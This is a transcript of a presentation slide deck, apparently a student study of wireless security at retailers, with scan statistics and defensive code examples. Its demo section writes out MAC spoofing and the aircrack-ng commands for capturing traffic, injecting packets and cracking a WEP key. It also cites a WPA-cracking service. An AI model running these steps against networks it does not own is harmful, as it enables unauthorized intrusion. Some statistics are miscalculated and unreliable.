An Empirical Study on Wireless Network Security for Retailers Khai Tran.



Presentation on theme: "An Empirical Study on Wireless Network Security for Retailers Khai Tran."— Presentation transcript:

1 An Empirical Study on Wireless Network Security for Retailers Khai Tran

2 Introduction
Retail merchants have been incorporating wireless solutions into their networks to increase efficiency and enhance the customer experience in order to increase margins.
- Apple – wireless handheld devices that provided credit authorization
- Starbucks – free Wi-Fi access for AT&T customers or those who wish to pay a fee of $3.99 for two hours
- Home Depot – wireless handheld devices are used throughout the store to perform inventory, price changes, and various other tasks
In doing so, some merchants are potentially opening up their doors to unlawful access by hackers who intend to do harm.

3 Lowe’s and TJX
Lowe’s - 2003
- Loosely protected wireless connection in Southfield, MI branch led to intrusion
- Trio of hackers (Brian Salcedo, Adam Botbyl, Paul Timmons) installed “hacking” software and were able to access Lowe’s stores in CA, KS, SD, and other states
TJX - 2005
- Two Miami-area Marshalls stores were compromised due to a breach in their unsecured wireless network
- Intruders had access to millions of credit card numbers due to weak data encryption

4 Purpose
Are Retailers Still Using WEP?
Goals:
- Scan wireless networks of retailers to determine if networks are secured and what type of security is in use
- As a proof of concept, set up a personal WLAN and attempt to crack WEP and WPA passwords to determine feasibility of attacks

5 WEP (Wired Equivalent Privacy)
- Introduced in 1997 to secure 802.11 wireless networks
- Several weaknesses detected in 2001
  - Simple Initialization Vector (IV), 24 bits
  - Repeats after about 5000 packets
  - Single shared key
  - Susceptible to eavesdropping
- Declared by IEEE in 2004 as failing to meet security requirements

6 WPA/WPA2 (Wi-Fi Protected Access)
- Introduced in 2003 to replace WEP
- IV is increased from 24 to 48 bits
  - Re-use of keys is unlikely
- 256 bit keys as opposed to 128
  - 2^128
- Implements TKIP (Temporal Key Integrity Protocol) to support pre-WPA
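The IV figures on the WEP and WPA slides, worked through as an added example (not part of the original presentation): the birthday bound gives the number of frames after which a repeated IV becomes likely for a 24-bit and a 48-bit IV. The function names and the model of IVs drawn uniformly at random are assumptions of this example.

```python
import math


def iv_collision_probability(iv_bits, packets):
    """Birthday approximation: P(some IV repeats) ~= 1 - exp(-n(n-1) / 2N).

    Assumes each frame's IV is drawn uniformly at random from N = 2**iv_bits
    values; the approximation is accurate while n is much smaller than N.
    """
    space = 2 ** iv_bits
    if packets > space:  # pigeonhole: more frames than IVs, a repeat is certain
        return 1.0
    return -math.expm1(-packets * (packets - 1) / (2 * space))


def packets_for_probability(iv_bits, target):
    """Smallest frame count whose repeat probability reaches target (0 < target < 1)."""
    space = 2 ** iv_bits
    # Closed-form starting guess n ~= sqrt(2N * ln(1 / (1 - target))), then step up.
    n = math.isqrt(int(2 * space * -math.log1p(-target)))
    while iv_collision_probability(iv_bits, n) < target:
        n += 1
    return n


def compare(iv_sizes=(24, 48), frames=5000, target=0.5):
    """One row per IV size: repeat probability at `frames`, and frames needed for `target`."""
    return [
        {
            "iv_bits": bits,
            "p_repeat_at_frames": iv_collision_probability(bits, frames),
            "frames_for_target": packets_for_probability(bits, target),
        }
        for bits in iv_sizes
    ]


if __name__ == "__main__":
    for row in compare():
        print(row)
```

With a single shared key, a repeated IV means a repeated keystream, which is why the 24-bit row matters to an eavesdropper and the 48-bit row does not at comparable traffic volumes.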

7 Tools Used for Passive Scans
- OCZ Neutrino netbook
  - Windows XP SP3
  - Intel Atom (N270) 1.60 GHz, 2.0 GB RAM
  - RealTek RTL8187SE Wireless LAN PCIE
- WirelessNetView software
  - Created by Nir Sofer
  - Version 1.26
  - www.nirsoft.net
- Why was WirelessNetView chosen for passive scans?
- Cities scanned: Sacramento, Citrus Heights, Roseville, Oroville, Chico

8 Sample Scan with WirelessNetView

9 Scan Results
65 retail networks were scanned over a period of two weeks
Security
- Less than 17% (11) were still using WEP to secure their network
- Of the 17%, only three (0.5%) were Big Box retailers while all the others were small local retail shops
- Most retailers have adopted WPA
No Security
- Just over 26% (17) had no security on their network
- 13 of these 17 were Big Box retailers

10 What is BackTrack?
- Created by Mati Aharoni and Max Moser
- Supported by Linux community
- www.remote-exploit.org
- Live Linux distro based on Slackware and available as a Live CD or on USB boot
- Includes tools such as kismet, metasploit, wireshark
- Used for pen testing, network security and analysis

11 Tools Used For Cracking
- Dell Latitude D820
  - Windows XP SP2
  - Intel Core 2 (T7200) 2.00 GHz, 2.0 GB RAM
  - Intel PRO/Wireless 3945ABG
- 2Wire 3800HGV-B Uverse Router
  - WEP, WPA, WPA2
- BackTrack version 3
  - airmon-ng
  - airodump-ng
  - aireplay-ng
  - aircrack-ng
  - macchanger

12 Steps to Cracking WEP
- Spoof MAC address
- Turn wireless card into monitoring mode
- Scan available networks and capture packets
- Inject ARP-request packets into network to generate traffic
- Feed data to aircrack-ng for password cracking

13 Check Wireless Driver

14 Spoof MAC Covering your tracks…

15 Search Available Networks
# airodump-ng wifi0

16 Capture Packets On Target Network
airodump-ng -c 3 -w smacs --bssid 00:21:7C:4E:89:51 wifi0

17 Inject Packets & Attempt to Crack
aireplay-ng -3 -b 00:21:7C:4E:89:51 -h 00:11:22:33:44:55 wifi0
aircrack-ng -b 00:21:7C:4E:89:51 smacs-01.cap

18 WEP Cracking Demonstration
- Linksys Wireless-G Router (WRT54G)
- SSID - 693TEST
- MAC – 00:1D:7E:35:AA:6D

19 Cracking WPA Requires deauthentication from AP and re-authentication
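Seen from the defender's side, the ARP-request injection in the WEP steps and the forced deauthentication noted for WPA both show up as abnormal frame rates. This added example (not from the original presentation) flags such bursts in a constructed frame log; the log format, MAC addresses, window length and limits are all assumptions of the example.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 1.0                        # assumed sliding-window length
LIMITS = {"arp-request": 30, "deauth": 5}   # assumed max frames per source per window


def parse_line(line):
    """Constructed log format: '<epoch seconds> <frame type> <source MAC> <BSSID>'."""
    ts, frame_type, src, bssid = line.split()
    return float(ts), frame_type, src.lower(), bssid.lower()


def detect_floods(lines, window=WINDOW_SECONDS, limits=LIMITS):
    """Return sorted (frame_type, source, bssid) keys whose rate exceeded its limit.

    Expects lines in time order, as a capture or controller log would be.
    """
    recent = defaultdict(deque)   # key -> timestamps still inside the window
    alerts = set()
    for line in lines:
        if not line.strip():
            continue
        ts, frame_type, src, bssid = parse_line(line)
        if frame_type not in limits:
            continue
        key = (frame_type, src, bssid)
        stamps = recent[key]
        stamps.append(ts)
        while ts - stamps[0] > window:   # drop frames older than the window
            stamps.popleft()
        if len(stamps) > limits[frame_type]:
            alerts.add(key)
    return sorted(alerts)


def constructed_sample():
    """Constructed frames: one ordinary client, one source replaying ARP and sending deauths."""
    ap = "02:00:00:00:00:aa"
    lines = [f"{100 + i * 2.0:.3f} arp-request 02:00:00:00:00:10 {ap}" for i in range(10)]
    lines += [f"{200 + i * 0.01:.3f} arp-request 02:00:00:00:00:66 {ap}" for i in range(200)]
    lines += [f"{300 + i * 0.05:.3f} deauth 02:00:00:00:00:66 {ap}" for i in range(20)]
    lines.append(f"400.000 deauth 02:00:00:00:00:10 {ap}")   # a single, ordinary deauth
    return lines


if __name__ == "__main__":
    for alert in detect_floods(constructed_sample()):
        print("rate limit exceeded:", alert)
```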

20 WPA-PSK Cracking Service

21 www.wpacracker.com

22 Conclusion
Big Box Retailers
- Most have either adopted WPA to secure their network or provided public portals for user authentication
Small & Local Retail Shops
- A small number are still using WEP or no security at all

23 Afterthoughts
Residential Wireless Networks
- A lot of networks are still using WEP
- Scan of Nord Ave
  - 182 networks detected
  - 36% (65) are using WEP
  - Out of the 182 networks, 29 are obvious 2WIRE### routers
  - 27 of these are using WEP
- 2006 survey by A. Bittau, M. Handley, and J. Lackey
  - 400 networks scanned in London: 76% WEP, 20% WPA, 4% 802.11i
  - 2,539 networks scanned in Seattle: 85% WEP, 14% WPA, 1% 802.11i

24 2WIRE WEP Networks

25 Questions?

26 References
- Andrea Bittau, Mark Handley, Joshua Lackey, "The Final Nail in WEP's Coffin," sp, pp.386-400, 2006 IEEE Symposium on Security and Privacy (S&P'06), 2006.
- Highspeed internet access at Starbucks. (2009). Retrieved from http://www.starbucks.com/retail/wireless.asp
- Kjell J. Hole, Erlend Dyrnes, Per Thorsheim, "Securing Wi-Fi Networks," Computer, vol. 38, no. 7, pp. 28-34, July 2005, doi:10.1109/MC.2005.241
- Carsten Maple, Helen Jacobs, Matthew Reeve, "Choosing the Right Wireless LAN Security Protocol for the Home and Business User," ares, pp.1025-1032, First International Conference on Availability, Reliability and Security (ARES'06), 2006
- Carmen Nobel. (November 21, 2005). Home Depot Tackles Network Challenge. Retrieved from http://www.eweek.com/c/a/Mobile-and-Wireless/Home-Depot-Tackles-Network-Challenge/
- Kevin Poulsen. (November 12, 2003). Wireless hacking bust in Michigan. Retrieved from http://www.securityfocus.com/news/7438
- Kim Zetter. (October 26, 2007). TJX Failed to Notice Thieves Moving 80-GBytes of Data on its Network. Retrieved from http://www.wired.com/threatlevel/2007/10/tjx-failed-to-n/
- Kim Zetter. (July 17, 2009). 4 Years After TJX Hack, Payment Industry Sets Security Standards. Retrieved from http://www.wired.com/threatlevel/2009/07/pci/
- Songhe Zhao, Charles A. Shoniregun, "Critical Review of Unsecured WEP," services, pp.368-374, 2007 IEEE Congress on Services (Services 2007), 2007
- www.nirsoft.net/about_nirsoft_freeware.html
- http://it.slashdot.org/story/09/12/07/2322235/WPA-PSK-Cracking-As-a-Service
- www.aircrack-ng.org

